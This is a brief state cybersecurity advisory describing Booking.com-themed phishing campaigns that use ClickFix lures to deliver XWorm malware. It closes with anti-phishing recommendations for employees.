In the past month, the NJCCIC’s email security solution identified an uptick in multiple campaigns attempting to deliver XWorm malware to New Jersey State employees to gain remote access, steal credentials, exfiltrate data, and deploy ransomware. The messages impersonate Booking.com or a customer of a hospitality organization with themes of last-minute bookings to address customer complaints, inquiries about upcoming travel plans, or issues related to past travel reservations. They display subject lines containing keywords such as reservation, booking cancellation, request for action, poor evaluation, hotel accommodation, and establishment difficulty.
The messages contain various types of URLs, such as email trackers, URL shorteners, and open redirects. There are multiple redirects and filtering techniques before arriving at one of the numerous landing pages with various layouts and scripting. The URLs for the landing pages contain keywords such as book, booking, complaint, feedback, inquiry, reportguest, and stayissueguest. The threat actors use the ClickFix technique to display dialogue boxes containing fake error messages to manipulate targets to follow instructions to “fix” the problem. Sometimes, they leverage the appearance of authenticity by using a fake CAPTCHA-themed ClickFix technique to validate the target. However, the target’s clicking copies, pastes, or executes malicious payloads or scripts in the background. The payloads use PowerShell or MSHTA commands to download and execute XWorm malware.
Recommendations
- Refrain from responding to unsolicited communications, clicking links, or opening attachments from unknown senders.
- Exercise caution with communications from known senders.
- Confirm requests from senders via contact information obtained from verified and official sources.
- Type official website URLs into browsers manually and only submit account credentials or sensitive information on official websites.
- Use strong, unique passwords for all accounts and enable multi-factor authentication (MFA) where available, choosing authentication apps or hardware tokens over SMS text-based codes.
- Reduce your digital footprint so threat actors cannot easily target you.
- Keep systems up to date and apply patches after appropriate testing.
- Report phishing emails and other malicious cyber activity to the FBI's IC3 and the NJCCIC.
